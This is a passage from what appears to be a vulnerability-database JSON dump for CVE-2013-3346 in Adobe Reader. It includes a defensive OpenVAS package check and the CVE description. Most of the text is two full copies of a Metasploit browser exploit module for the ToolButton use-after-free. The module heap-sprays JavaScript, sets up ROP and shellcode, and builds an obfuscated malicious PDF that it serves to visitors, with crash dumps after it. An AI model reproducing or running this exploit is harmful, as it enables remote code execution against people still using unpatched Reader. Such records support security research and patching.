"05e1264e7c2f04b9dbcb6d8d76e48585"}, {"key": "published", "hash": "311fe06b3cf4192127ad9986f2239f2a"}, {"key": "references", "hash": "2cb7a575ddfd9e4fcdd5d5e26d26e610"}, {"key": "reporter", "hash": "bb3dbc0ecae053747a8a163af717a25f"}, {"key": "sourceData", "hash": "589c062b55f39e8ff43a33d236527a1f"}, {"key": "title", "hash": "385d33352d9166a7843835ca90fab1b9"}, {"key": "type", "hash": "47c1f692ea47a21f716dad07043ade01"}], "hash": "d2b3fc47810108cf1003ee2d230c0bf847722766ff560bbdf8adb44a3a4d9fed", "viewCount": 4, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-3346"]}, {"type": "nessus", "idList": ["GENTOO_GLSA-201309-10.NASL", "REDHAT-RHSA-2013-0826.NASL", "MACOSX_ADOBE_READER_APSB13-15.NASL", "ADOBE_READER_APSB13-15.NASL", "ADOBE_ACROBAT_APSB13-15.NASL"]}, 
{"type": "exploitdb", "idList": ["EDB-ID:30394"]}, {"type": "gentoo", "idList": ["GLSA-201309-10"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/FILEFORMAT/ADOBE_TOOLBUTTON", "MSF:EXPLOIT/WINDOWS/BROWSER/ADOBE_TOOLBUTTON"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:124464", "PACKETSTORM:124463"]}, {"type": "zdi", "idList": ["ZDI-13-212"]}, {"type": "seebug", "idList": ["SSV:61170"]}, {"type": "canvas", "idList": ["ACROBAT_TOOLBUTTON"]}, {"type": "zdt", "idList": ["1337DAY-ID-21684"]}, {"type": "thn", "idList": ["THN:1EA4AB16D6C3A0518A078CC8C9304FA5"]}, {"type": "threatpost", "idList": ["THREATPOST:B27D20AA97E34E737FEFFB96CFD7603B"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310803616", "OPENVAS:1361412562310803617", "OPENVAS:1361412562310803614", "OPENVAS:1361412562310803613", "OPENVAS:1361412562310803615"]}, {"type": "kaspersky", "idList": ["KLA10457"]}], "modified": "2019-05-29T18:36:08"}, "score": {"value": 8.8, "vector": "NONE", "modified": "2019-05-29T18:36:08"}, "vulnersScore": 8.8}, "objectVersion": "1.3", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa-201309-10.nasl 12128 2018-10-26 13:35:25Z cfischer $\n#\n# Gentoo Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.121024\");\n script_version(\"$Revision: 12128 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-29 11:25:50 +0300 (Tue, 29 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 15:35:25 +0200 (Fri, 26 Oct 2018) $\");\n script_name(\"Gentoo Security Advisory GLSA 201309-10\");\n script_tag(name:\"insight\", value:\"An unspecified vulnerability exists in Adobe Reader.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://security.gentoo.org/glsa/201309-10\");\n script_cve_id(\"CVE-2013-3346\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks GLSA 201309-10\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Gentoo Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"app-text/acroread\", unaffected: make_list(\"ge 9.5.5\"), vulnerable: make_list(\"lt 9.5.5\"))) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", 
"naslFamily": "Gentoo Local Security Checks", "pluginID": "1361412562310121024", "scheme": null}
{"cve": [{"lastseen": "2019-05-29T18:13:03", "bulletinFamily": "NVD", "description": "Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11.x before 11.0.03 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-2718, CVE-2013-2719, CVE-2013-2720, CVE-2013-2721, CVE-2013-2722, CVE-2013-2723, CVE-2013-2725, CVE-2013-2726, CVE-2013-2731, CVE-2013-2732, CVE-2013-2734, CVE-2013-2735, CVE-2013-2736, CVE-2013-3337, CVE-2013-3338, CVE-2013-3339, CVE-2013-3340, and CVE-2013-3341.", "modified": "2017-09-19T01:36:00", "id": "CVE-2013-3346", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-3346", "published": "2013-08-30T20:55:00", "title": "CVE-2013-3346", "type": "cve", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T17:39:30", "bulletinFamily": "exploit", "description": "CVE ID:CVE-2013-3346\r\n\r\nAdobe Reader\u548cAcrobat\u4e2d\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\u3002\u653b\u51fb\u8005\u53ef\u5229\u7528\u8be5\u6f0f\u6d1e\u6267\u884c\u4efb\u610f\u4ee3\u7801\u6216\u9020\u6210\u62d2\u7edd\u670d\u52a1\uff08\u5185\u5b58\u635f\u574f\uff09\u3002\n0\nAdobe Reader\u548cAcrobat 9.5.5\u4e4b\u524d\u76849.x\u7248\u672c\uff0c10.1.7\u4e4b\u524d\u768410.x\u7248\u672c\uff0c11.0.03\u4e4b\u524d\u768411.x\u7248\u672c\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nAdobe\r\n-----\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttp://www.adobe.com/support/security/bulletins/apsb13-15.html", "modified": "2013-12-18T00:00:00", "published": "2013-12-18T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-61170", "id": "SSV:61170", "type": "seebug", "title": "Adobe Reader\u548cAcrobat\u5185\u5b58\u635f\u574f\u6f0f\u6d1e", "sourceData": "\n ##\r\n# This 
module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n \r\nrequire 'msf/core'\r\n \r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n \r\n include Msf::Exploit::Remote::BrowserExploitServer\r\n \r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => "Adobe Reader ToolButton Use After Free",\r\n 'Description' => %q{\r\n This module exploits an use after free condition on Adobe Reader versions 11.0.2, 10.1.6\r\n and 9.5.4 and prior. The vulnerability exists while handling the ToolButton object, where\r\n the cEnable callback can be used to early free the object memory. Later use of the object\r\n allows triggering the use after free condition. This module has been tested successfully\r\n on Adobe Reader 11.0.2 and 10.0.4, with IE and Windows XP SP3, as exploited in the wild in\r\n November, 2013. At the moment, this module doesn't support Adobe Reader 9 targets; in order\r\n to exploit Adobe Reader 9 the fileformat version of the exploit can be used.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Soroush Dalili', # Vulnerability discovery\r\n 'Unknown', # Exploit in the wild\r\n 'sinn3r', # Metasploit module\r\n 'juan vazquez' # Metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2013-3346' ],\r\n [ 'OSVDB', '96745' ],\r\n [ 'ZDI', '13-212' ],\r\n [ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb13-15.html' ],\r\n [ 'URL', 'http://www.fireeye.com/blog/technical/cyber-exploits/2013/11/ms-windows-local-privilege-escalation-zero-day-in-the-wild.html' ]\r\n ],\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X86,\r\n 'Payload' =>\r\n {\r\n 'Space' => 1024,\r\n 'BadChars' => "\\x00",\r\n 'DisableNops' => true\r\n },\r\n 'BrowserRequirements' =>\r\n {\r\n :source => /script|headers/i,\r\n :os_name => Msf::OperatingSystems::WINDOWS,\r\n :os_flavor => Msf::OperatingSystems::WindowsVersions::XP,\r\n :ua_name => 
Msf::HttpClients::IE\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'Windows XP / IE / Adobe Reader 10/11', { } ],\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => "Aug 08 2013",\r\n 'DefaultTarget' => 0))\r\n \r\n end\r\n \r\n def on_request_exploit(cli, request, target_info)\r\n print_status("request: #{request.uri}")\r\n js_data = make_js(cli, target_info)\r\n # Create the pdf\r\n pdf = make_pdf(js_data)\r\n print_status("Sending PDF...")\r\n send_response(cli, pdf, { 'Content-Type' => 'application/pdf', 'Pragma' => 'no-cache' })\r\n end\r\n \r\n def make_js(cli, target_info)\r\n # CreateFileMappingA + MapViewOfFile + memcpy rop chain\r\n rop_10 = Rex::Text.to_unescape(generate_rop_payload('reader', '', { 'target' => '10' }))\r\n rop_11 = Rex::Text.to_unescape(generate_rop_payload('reader', '', { 'target' => '11' }))\r\n escaped_payload = Rex::Text.to_unescape(get_payload(cli, target_info))\r\n \r\n js = %Q|\r\nfunction heapSpray(str, str_addr, r_addr) {\r\n var aaa = unescape("%u0c0c");\r\n aaa += aaa;\r\n while ((aaa.length + 24 + 4) < (0x8000 + 0x8000)) aaa += aaa;\r\n var i1 = r_addr - 0x24;\r\n var bbb = aaa.substring(0, i1 / 2);\r\n var sa = str_addr;\r\n while (sa.length < (0x0c0c - r_addr)) sa += sa;\r\n bbb += sa;\r\n bbb += aaa;\r\n var i11 = 0x0c0c - 0x24;\r\n bbb = bbb.substring(0, i11 / 2);\r\n bbb += str;\r\n bbb += aaa;\r\n var i2 = 0x4000 + 0xc000;\r\n var ccc = bbb.substring(0, i2 / 2);\r\n while (ccc.length < (0x40000 + 0x40000)) ccc += ccc;\r\n var i3 = (0x1020 - 0x08) / 2;\r\n var ddd = ccc.substring(0, 0x80000 - i3);\r\n var eee = new Array();\r\n for (i = 0; i < 0x1e0 + 0x10; i++) eee[i] = ddd + "s";\r\n return;\r\n}\r\nvar shellcode = unescape("#{escaped_payload}");\r\nvar executable = "";\r\nvar rop10 = unescape("#{rop_10}");\r\nvar rop11 = unescape("#{rop_11}");\r\nvar r11 = false;\r\nvar vulnerable = true;\r\n \r\nvar obj_size;\r\nvar rop;\r\nvar ret_addr;\r\nvar rop_addr;\r\nvar r_addr;\r\n \r\nif (app.viewerVersion >= 10 && 
app.viewerVersion < 11 && app.viewerVersion <= 10.106) {\r\n obj_size = 0x360 + 0x1c;\r\n rop = rop10;\r\n rop_addr = unescape("%u08e4%u0c0c");\r\n r_addr = 0x08e4;\r\n ret_addr = unescape("%ua8df%u4a82");\r\n} else if (app.viewerVersion >= 11 && app.viewerVersion <= 11.002) {\r\n r11 = true;\r\n obj_size = 0x370;\r\n rop = rop11;\r\n rop_addr = unescape("%u08a8%u0c0c");\r\n r_addr = 0x08a8;\r\n ret_addr = unescape("%u8003%u4a84");\r\n} else {\r\n vulnerable = false;\r\n}\r\n \r\nif (vulnerable) {\r\n var payload = rop + shellcode;\r\n heapSpray(payload, ret_addr, r_addr);\r\n \r\n var part1 = "";\r\n if (!r11) {\r\n for (i = 0; i < 0x1c / 2; i++) part1 += unescape("%u4141");\r\n }\r\n part1 += rop_addr;\r\n var part2 = "";\r\n var part2_len = obj_size - part1.length * 2;\r\n for (i = 0; i < part2_len / 2 - 1; i++) part2 += unescape("%u4141");\r\n var arr = new Array();\r\n \r\n removeButtonFunc = function () {\r\n app.removeToolButton({\r\n cName: "evil"\r\n });\r\n \r\n for (i = 0; i < 10; i++) arr[i] = part1.concat(part2);\r\n }\r\n \r\n addButtonFunc = function () {\r\n app.addToolButton({\r\n cName: "xxx",\r\n cExec: "1",\r\n cEnable: "removeButtonFunc();"\r\n });\r\n }\r\n \r\n app.addToolButton({\r\n cName: "evil",\r\n cExec: "1",\r\n cEnable: "addButtonFunc();"\r\n });\r\n}\r\n|\r\n \r\n js\r\n end\r\n \r\n def RandomNonASCIIString(count)\r\n result = ""\r\n count.times do\r\n result << (rand(128) + 128).chr\r\n end\r\n result\r\n end\r\n \r\n def ioDef(id)\r\n "%d 0 obj \\n" % id\r\n end\r\n \r\n def ioRef(id)\r\n "%d 0 R" % id\r\n end\r\n \r\n \r\n #http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/\r\n def nObfu(str)\r\n #return str\r\n result = ""\r\n str.scan(/./u) do |c|\r\n if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'\r\n result << "#%x" % c.unpack("C*")[0]\r\n else\r\n result << c\r\n end\r\n end\r\n result\r\n end\r\n \r\n \r\n def ASCIIHexWhitespaceEncode(str)\r\n result = ""\r\n whitespace = ""\r\n str.each_byte do 
|b|\r\n result << whitespace << "%02x" % b\r\n whitespace = " " * (rand(3) + 1)\r\n end\r\n result << ">"\r\n end\r\n \r\n \r\n def make_pdf(js)\r\n xref = []\r\n eol = "\\n"\r\n endobj = "endobj" << eol\r\n \r\n # Randomize PDF version?\r\n pdf = "%PDF-1.5" << eol\r\n pdf << "%" << RandomNonASCIIString(4) << eol\r\n \r\n # catalog\r\n xref << pdf.length\r\n pdf << ioDef(1) << nObfu("<<") << eol\r\n pdf << nObfu("/Pages ") << ioRef(2) << eol\r\n pdf << nObfu("/Type /Catalog") << eol\r\n pdf << nObfu("/OpenAction ") << ioRef(4) << eol\r\n # The AcroForm is required to get icucnv36.dll / icucnv40.dll to load\r\n pdf << nObfu("/AcroForm ") << ioRef(6) << eol\r\n pdf << nObfu(">>") << eol\r\n pdf << endobj\r\n \r\n # pages array\r\n xref << pdf.length\r\n pdf << ioDef(2) << nObfu("<<") << eol\r\n pdf << nObfu("/Kids [") << ioRef(3) << "]" << eol\r\n pdf << nObfu("/Count 1") << eol\r\n pdf << nObfu("/Type /Pages") << eol\r\n pdf << nObfu(">>") << eol\r\n pdf << endobj\r\n \r\n # page 1\r\n xref << pdf.length\r\n pdf << ioDef(3) << nObfu("<<") << eol\r\n pdf << nObfu("/Parent ") << ioRef(2) << eol\r\n pdf << nObfu("/Type /Page") << eol\r\n pdf << nObfu(">>") << eol # end obj dict\r\n pdf << endobj\r\n \r\n # js action\r\n xref << pdf.length\r\n pdf << ioDef(4) << nObfu("<<")\r\n pdf << nObfu("/Type/Action/S/JavaScript/JS ") + ioRef(5)\r\n pdf << nObfu(">>") << eol\r\n pdf << endobj\r\n \r\n # js stream\r\n xref << pdf.length\r\n compressed = Zlib::Deflate.deflate(ASCIIHexWhitespaceEncode(js))\r\n pdf << ioDef(5) << nObfu("<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>" % compressed.length) << eol\r\n pdf << "stream" << eol\r\n pdf << compressed << eol\r\n pdf << "endstream" << eol\r\n pdf << endobj\r\n \r\n ###\r\n # The following form related data is required to get icucnv36.dll / icucnv40.dll to load\r\n ###\r\n \r\n # form object\r\n xref << pdf.length\r\n pdf << ioDef(6)\r\n pdf << nObfu("<</XFA ") << ioRef(7) << nObfu(">>") << eol\r\n pdf << endobj\r\n \r\n # 
form stream\r\n xfa = <<-EOF\r\n<?xml version="1.0" encoding="UTF-8"?>\r\n<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">\r\n<config xmlns="http://www.xfa.org/schema/xci/2.6/">\r\n<present><pdf><interactive>1</interactive></pdf></present>\r\n</config>\r\n<template xmlns="http://www.xfa.org/schema/xfa-template/2.6/">\r\n<subform name="form1" layout="tb" locale="en_US">\r\n<pageSet></pageSet>\r\n</subform></template></xdp:xdp>\r\n EOF\r\n \r\n xref << pdf.length\r\n pdf << ioDef(7) << nObfu("<</Length %s>>" % xfa.length) << eol\r\n pdf << "stream" << eol\r\n pdf << xfa << eol\r\n pdf << "endstream" << eol\r\n pdf << endobj\r\n \r\n ###\r\n # end form stuff for icucnv36.dll / icucnv40.dll\r\n ###\r\n \r\n \r\n # trailing stuff\r\n xrefPosition = pdf.length\r\n pdf << "xref" << eol\r\n pdf << "0 %d" % (xref.length + 1) << eol\r\n pdf << "0000000000 65535 f" << eol\r\n xref.each do |index|\r\n pdf << "%010d 00000 n" % index << eol\r\n end\r\n \r\n pdf << "trailer" << eol\r\n pdf << nObfu("<</Size %d/Root " % (xref.length + 1)) << ioRef(1) << ">>" << eol\r\n \r\n pdf << "startxref" << eol\r\n pdf << xrefPosition.to_s() << eol\r\n \r\n pdf << "%%EOF" << eol\r\n pdf\r\n end\r\n \r\nend\r\n \r\n \r\n=begin\r\n \r\n* crash Adobe Reader 10.1.4\r\n \r\nFirst chance exceptions are reported before any exception handling.\r\nThis exception may be expected and handled.\r\neax=0c0c08e4 ebx=00000000 ecx=02eb6774 edx=66dd0024 esi=02eb6774 edi=00000001\r\neip=604d3a4d esp=0012e4fc ebp=0012e51c iopl=0 nv up ei pl nz ac po cy\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010213\r\nAcroRd32_60000000!PDFLTerm+0xbb7cd:\r\n604d3a4d ff9028030000 call dword ptr [eax+328h] ds:0023:0c0c0c0c=????????\r\n \r\n* crash Adobe Reader 11.0.2\r\n \r\n(940.d70): Access violation - code c0000005 (first chance)\r\nFirst chance exceptions are reported before any exception handling.\r\nThis exception may be expected and handled.\r\n*** ERROR: Symbol file could not be found. 
Defaulted to export symbols for C:\\Program Files\\Adobe\\Reader 11.0\\Reader\\AcroRd32.dll -\r\neax=0c0c08a8 ebx=00000001 ecx=02d68090 edx=5b21005b esi=02d68090 edi=00000000\r\neip=60197b9b esp=0012e3fc ebp=0012e41c iopl=0 nv up ei pl nz ac po cy\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210213\r\nAcroRd32_60000000!DllCanUnloadNow+0x1493ae:\r\n60197b9b ff9064030000 call dword ptr [eax+364h] ds:0023:0c0c0c0c=????????\r\n \r\n=end\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-61170", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:22:32", "bulletinFamily": "exploit", "description": "", "modified": "2013-12-17T00:00:00", "published": "2013-12-17T00:00:00", "href": "https://packetstormsecurity.com/files/124464/Adobe-Reader-ToolButton-Use-After-Free.html", "id": "PACKETSTORM:124464", "type": "packetstorm", "title": "Adobe Reader ToolButton Use After Free", "sourceData": "`## \n# This module requires Metasploit: http//metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = NormalRanking \n \ninclude Msf::Exploit::Remote::BrowserExploitServer \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => \"Adobe Reader ToolButton Use After Free\", \n'Description' => %q{ \nThis module exploits an use after free condition on Adobe Reader versions 11.0.2, 10.1.6 \nand 9.5.4 and prior. The vulnerability exists while handling the ToolButton object, where \nthe cEnable callback can be used to early free the object memory. Later use of the object \nallows triggering the use after free condition. This module has been tested successfully \non Adobe Reader 11.0.2 and 10.0.4, with IE and Windows XP SP3, as exploited in the wild in \nNovember, 2013. 
At the moment, this module doesn't support Adobe Reader 9 targets; in order \nto exploit Adobe Reader 9 the fileformat version of the exploit can be used. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Soroush Dalili', # Vulnerability discovery \n'Unknown', # Exploit in the wild \n'sinn3r', # Metasploit module \n'juan vazquez' # Metasploit module \n], \n'References' => \n[ \n[ 'CVE', '2013-3346' ], \n[ 'OSVDB', '96745' ], \n[ 'ZDI', '13-212' ], \n[ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb13-15.html' ], \n[ 'URL', 'http://www.fireeye.com/blog/technical/cyber-exploits/2013/11/ms-windows-local-privilege-escalation-zero-day-in-the-wild.html' ] \n], \n'Platform' => 'win', \n'Arch' => ARCH_X86, \n'Payload' => \n{ \n'Space' => 1024, \n'BadChars' => \"\\x00\", \n'DisableNops' => true \n}, \n'BrowserRequirements' => \n{ \n:source => /script|headers/i, \n:os_name => Msf::OperatingSystems::WINDOWS, \n:os_flavor => Msf::OperatingSystems::WindowsVersions::XP, \n:ua_name => Msf::HttpClients::IE \n}, \n'Targets' => \n[ \n[ 'Windows XP / IE / Adobe Reader 10/11', { } ], \n], \n'Privileged' => false, \n'DisclosureDate' => \"Aug 08 2013\", \n'DefaultTarget' => 0)) \n \nend \n \ndef on_request_exploit(cli, request, target_info) \nprint_status(\"request: #{request.uri}\") \njs_data = make_js(cli, target_info) \n# Create the pdf \npdf = make_pdf(js_data) \nprint_status(\"Sending PDF...\") \nsend_response(cli, pdf, { 'Content-Type' => 'application/pdf', 'Pragma' => 'no-cache' }) \nend \n \ndef make_js(cli, target_info) \n# CreateFileMappingA + MapViewOfFile + memcpy rop chain \nrop_10 = Rex::Text.to_unescape(generate_rop_payload('reader', '', { 'target' => '10' })) \nrop_11 = Rex::Text.to_unescape(generate_rop_payload('reader', '', { 'target' => '11' })) \nescaped_payload = Rex::Text.to_unescape(get_payload(cli, target_info)) \n \njs = %Q| \nfunction heapSpray(str, str_addr, r_addr) { \nvar aaa = unescape(\"%u0c0c\"); \naaa += aaa; \nwhile ((aaa.length + 24 + 
4) < (0x8000 + 0x8000)) aaa += aaa; \nvar i1 = r_addr - 0x24; \nvar bbb = aaa.substring(0, i1 / 2); \nvar sa = str_addr; \nwhile (sa.length < (0x0c0c - r_addr)) sa += sa; \nbbb += sa; \nbbb += aaa; \nvar i11 = 0x0c0c - 0x24; \nbbb = bbb.substring(0, i11 / 2); \nbbb += str; \nbbb += aaa; \nvar i2 = 0x4000 + 0xc000; \nvar ccc = bbb.substring(0, i2 / 2); \nwhile (ccc.length < (0x40000 + 0x40000)) ccc += ccc; \nvar i3 = (0x1020 - 0x08) / 2; \nvar ddd = ccc.substring(0, 0x80000 - i3); \nvar eee = new Array(); \nfor (i = 0; i < 0x1e0 + 0x10; i++) eee[i] = ddd + \"s\"; \nreturn; \n} \nvar shellcode = unescape(\"#{escaped_payload}\"); \nvar executable = \"\"; \nvar rop10 = unescape(\"#{rop_10}\"); \nvar rop11 = unescape(\"#{rop_11}\"); \nvar r11 = false; \nvar vulnerable = true; \n \nvar obj_size; \nvar rop; \nvar ret_addr; \nvar rop_addr; \nvar r_addr; \n \nif (app.viewerVersion >= 10 && app.viewerVersion < 11 && app.viewerVersion <= 10.106) { \nobj_size = 0x360 + 0x1c; \nrop = rop10; \nrop_addr = unescape(\"%u08e4%u0c0c\"); \nr_addr = 0x08e4; \nret_addr = unescape(\"%ua8df%u4a82\"); \n} else if (app.viewerVersion >= 11 && app.viewerVersion <= 11.002) { \nr11 = true; \nobj_size = 0x370; \nrop = rop11; \nrop_addr = unescape(\"%u08a8%u0c0c\"); \nr_addr = 0x08a8; \nret_addr = unescape(\"%u8003%u4a84\"); \n} else { \nvulnerable = false; \n} \n \nif (vulnerable) { \nvar payload = rop + shellcode; \nheapSpray(payload, ret_addr, r_addr); \n \nvar part1 = \"\"; \nif (!r11) { \nfor (i = 0; i < 0x1c / 2; i++) part1 += unescape(\"%u4141\"); \n} \npart1 += rop_addr; \nvar part2 = \"\"; \nvar part2_len = obj_size - part1.length * 2; \nfor (i = 0; i < part2_len / 2 - 1; i++) part2 += unescape(\"%u4141\"); \nvar arr = new Array(); \n \nremoveButtonFunc = function () { \napp.removeToolButton({ \ncName: \"evil\" \n}); \n \nfor (i = 0; i < 10; i++) arr[i] = part1.concat(part2); \n} \n \naddButtonFunc = function () { \napp.addToolButton({ \ncName: \"xxx\", \ncExec: \"1\", \ncEnable: 
\"removeButtonFunc();\" \n}); \n} \n \napp.addToolButton({ \ncName: \"evil\", \ncExec: \"1\", \ncEnable: \"addButtonFunc();\" \n}); \n} \n| \n \njs \nend \n \ndef RandomNonASCIIString(count) \nresult = \"\" \ncount.times do \nresult << (rand(128) + 128).chr \nend \nresult \nend \n \ndef ioDef(id) \n\"%d 0 obj \\n\" % id \nend \n \ndef ioRef(id) \n\"%d 0 R\" % id \nend \n \n \n#http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/ \ndef nObfu(str) \n#return str \nresult = \"\" \nstr.scan(/./u) do |c| \nif rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z' \nresult << \"#%x\" % c.unpack(\"C*\")[0] \nelse \nresult << c \nend \nend \nresult \nend \n \n \ndef ASCIIHexWhitespaceEncode(str) \nresult = \"\" \nwhitespace = \"\" \nstr.each_byte do |b| \nresult << whitespace << \"%02x\" % b \nwhitespace = \" \" * (rand(3) + 1) \nend \nresult << \">\" \nend \n \n \ndef make_pdf(js) \nxref = [] \neol = \"\\n\" \nendobj = \"endobj\" << eol \n \n# Randomize PDF version? \npdf = \"%PDF-1.5\" << eol \npdf << \"%\" << RandomNonASCIIString(4) << eol \n \n# catalog \nxref << pdf.length \npdf << ioDef(1) << nObfu(\"<<\") << eol \npdf << nObfu(\"/Pages \") << ioRef(2) << eol \npdf << nObfu(\"/Type /Catalog\") << eol \npdf << nObfu(\"/OpenAction \") << ioRef(4) << eol \n# The AcroForm is required to get icucnv36.dll / icucnv40.dll to load \npdf << nObfu(\"/AcroForm \") << ioRef(6) << eol \npdf << nObfu(\">>\") << eol \npdf << endobj \n \n# pages array \nxref << pdf.length \npdf << ioDef(2) << nObfu(\"<<\") << eol \npdf << nObfu(\"/Kids [\") << ioRef(3) << \"]\" << eol \npdf << nObfu(\"/Count 1\") << eol \npdf << nObfu(\"/Type /Pages\") << eol \npdf << nObfu(\">>\") << eol \npdf << endobj \n \n# page 1 \nxref << pdf.length \npdf << ioDef(3) << nObfu(\"<<\") << eol \npdf << nObfu(\"/Parent \") << ioRef(2) << eol \npdf << nObfu(\"/Type /Page\") << eol \npdf << nObfu(\">>\") << eol # end obj dict \npdf << endobj \n \n# js action \nxref << pdf.length \npdf << ioDef(4) << 
nObfu(\"<<\") \npdf << nObfu(\"/Type/Action/S/JavaScript/JS \") + ioRef(5) \npdf << nObfu(\">>\") << eol \npdf << endobj \n \n# js stream \nxref << pdf.length \ncompressed = Zlib::Deflate.deflate(ASCIIHexWhitespaceEncode(js)) \npdf << ioDef(5) << nObfu(\"<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>\" % compressed.length) << eol \npdf << \"stream\" << eol \npdf << compressed << eol \npdf << \"endstream\" << eol \npdf << endobj \n \n### \n# The following form related data is required to get icucnv36.dll / icucnv40.dll to load \n### \n \n# form object \nxref << pdf.length \npdf << ioDef(6) \npdf << nObfu(\"<</XFA \") << ioRef(7) << nObfu(\">>\") << eol \npdf << endobj \n \n# form stream \nxfa = <<-EOF \n<?xml version=\"1.0\" encoding=\"UTF-8\"?> \n<xdp:xdp xmlns:xdp=\"http://ns.adobe.com/xdp/\"> \n<config xmlns=\"http://www.xfa.org/schema/xci/2.6/\"> \n<present><pdf><interactive>1</interactive></pdf></present> \n</config> \n<template xmlns=\"http://www.xfa.org/schema/xfa-template/2.6/\"> \n<subform name=\"form1\" layout=\"tb\" locale=\"en_US\"> \n<pageSet></pageSet> \n</subform></template></xdp:xdp> \nEOF \n \nxref << pdf.length \npdf << ioDef(7) << nObfu(\"<</Length %s>>\" % xfa.length) << eol \npdf << \"stream\" << eol \npdf << xfa << eol \npdf << \"endstream\" << eol \npdf << endobj \n \n### \n# end form stuff for icucnv36.dll / icucnv40.dll \n### \n \n \n# trailing stuff \nxrefPosition = pdf.length \npdf << \"xref\" << eol \npdf << \"0 %d\" % (xref.length + 1) << eol \npdf << \"0000000000 65535 f\" << eol \nxref.each do |index| \npdf << \"%010d 00000 n\" % index << eol \nend \n \npdf << \"trailer\" << eol \npdf << nObfu(\"<</Size %d/Root \" % (xref.length + 1)) << ioRef(1) << \">>\" << eol \n \npdf << \"startxref\" << eol \npdf << xrefPosition.to_s() << eol \n \npdf << \"%%EOF\" << eol \npdf \nend \n \nend \n \n \n=begin \n \n* crash Adobe Reader 10.1.4 \n \nFirst chance exceptions are reported before any exception handling. 
